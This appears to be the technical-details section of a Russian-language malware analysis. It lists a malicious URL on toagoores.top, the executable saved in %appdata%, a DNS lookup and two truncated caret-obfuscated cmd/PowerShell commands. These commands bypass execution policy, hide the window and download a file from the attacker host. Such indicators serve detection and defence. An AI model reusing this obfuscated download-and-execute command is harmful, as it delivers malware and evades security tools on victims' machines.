Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^w^ErS^h^E^LL^.^eXE^ -e^xEC^U^TiOnPOliC^Y^ ^BYpASs^ ^-^n^O^PROFilE^ -w^i^n^DOW^S^tYLE ^hId^DE^N^ (^NEw-^obJ^EcT SYst^EM.N^ET.^WebC^Lie^n^t).^DOWnlO^Ad^FI^Le('http://toagoores.top/...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "PO^w^ErS^h^E^LL^.^eXE^ -e^xEC^U^TiOnPOliC^Y^ ^BYpASs^ ^-^n^O^PROFilE^ -w^i^n^DOW^S^tYLE ^hId^DE^N^ (^NEw-^obJ^EcT SYst^EM.N^ET.^WebC^Lie^n^t).^DOWnlO^Ad^FI^Le('http://toagoores.top/...' (со скрытым окном)